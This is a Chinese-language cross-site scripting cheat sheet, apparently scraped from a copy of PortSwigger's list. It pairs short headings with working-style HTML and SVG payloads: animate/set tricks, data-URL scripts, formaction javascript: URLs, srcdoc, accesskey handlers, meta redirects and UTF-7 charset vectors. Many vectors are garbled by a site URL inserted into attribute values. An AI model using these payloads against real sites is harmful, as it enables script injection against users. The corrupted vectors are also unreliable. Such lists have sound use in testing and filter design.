使用值的SVG动画标签
<svg><animate xlink:href=http://www.likecs.com/#xss attributeName=href values=http://www.likecs.com/javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>SVG动画标签用于
<svg><animate xlink:href=http://www.likecs.com/#xss attributeName=href from=http://www.likecs.com/javascript:alert(1) to=http://www.likecs.com/1 /><a id=xss><text x=20 y=20>XSS</text></a>SVG设置标签
<svg><set xlink:href=http://www.likecs.com/#xss attributeName=href from=? to=http://www.likecs.com/javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>脚本src中的数据协议
<script src="http://www.likecs.com/data:text/javascript,alert(1)"></script>SVG脚本href属性,无需关闭脚本标签
<svg><script href=http://www.likecs.com/"http://www.likecs.com/data:text/javascript,alert(1)" />SVG使用元素Chrome/Firefox
<svg><use href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' /></a></svg>#x"></use></svg>带有数据URL的导入语句
<script>import('http://www.likecs.com/data:text/javascript,alert(1)')</script>具有JavaScript协议的基本标记重写了相对URL
<base href="javascript:/a/-alert(1)///////"><a href=MathML使任何标签都可点击
<math><x href=http://www.likecs.com/"javascript:alert(1)">blah按钮和动作
<form><button formaction=http://www.likecs.com/javascript:alert(1)>XSS输入和形式
<form><input type=submit formaction=http://www.likecs.com/javascript:alert(1) value=XSS>形式与行动
<form action=http://www.likecs.com/javascript:alert(1)><input type=submit value=XSS>Isindex和formaction
<isindex type=submit formaction=http://www.likecs.com/javascript:alert(1)>index和action
<isindex type=submit action=http://www.likecs.com/javascript:alert(1)>将元素与外部网址一起使用
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg> 其他有用的属性使用srcdoc属性
<iframe srcdoc="<img src=http://www.likecs.com/1 onerror=alert(1)>"></iframe>对实体使用srcdoc
<iframe srcdoc="<img src=http://www.likecs.com/1 onerror=alert(1)>"></iframe>在页面上的任何位置(甚至在表单外部)单击提交元素
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>隐藏的输入:访问键属性可以在通常无法利用的元素上启用XSS
<input type=http://www.likecs.com/"hidden" accesskey=http://www.likecs.com/"X" onclick=http://www.likecs.com/"alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)链接元素:访问键属性可以在通常无法利用的元素上启用XSS
<link rel=http://www.likecs.com/"canonical" accesskey=http://www.likecs.com/"X" onclick=http://www.likecs.com/"alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)下载属性可以保存当前网页的副本
<a href=http://www.likecs.com/# download="filename.html">Test</a>使用Referrerpolicy禁用引荐来源网址
<img referrerpolicy=http://www.likecs.com/"no-referrer" src=http://www.likecs.com/"http://portswigger-labs.net"> 特殊标签重定向到其他域
<meta http-equiv=http://www.likecs.com/"refresh" content=http://www.likecs.com/"0; url=http://www.likecs.com//portswigger-labs.net">元字符集属性UTF-7
<meta charset=http://www.likecs.com/"UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-元字符集UTF-7
<meta http-equiv=http://www.likecs.com/"Content-Type" content=http://www.likecs.com/"text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-UTF-7 BOM字符(必须在文档开头)1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-UTF-7 BOM字符(必须在文档开头)2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-UTF-7 BOM字符(必须在文档开头)3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-UTF-7 BOM字符(必须在文档开头)4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-升级不安全的请求
<meta http-equiv=http://www.likecs.com/"Content-Security-Policy" content=http://www.likecs.com/"upgrade-insecure-requests">通过iframe沙箱禁用JavaScript
<iframe sandbox src="http://portswigger-labs.net"></iframe>禁用引荐来源
<meta name=http://www.likecs.com/"referrer" content=http://www.likecs.com/"no-referrer"> 编码方式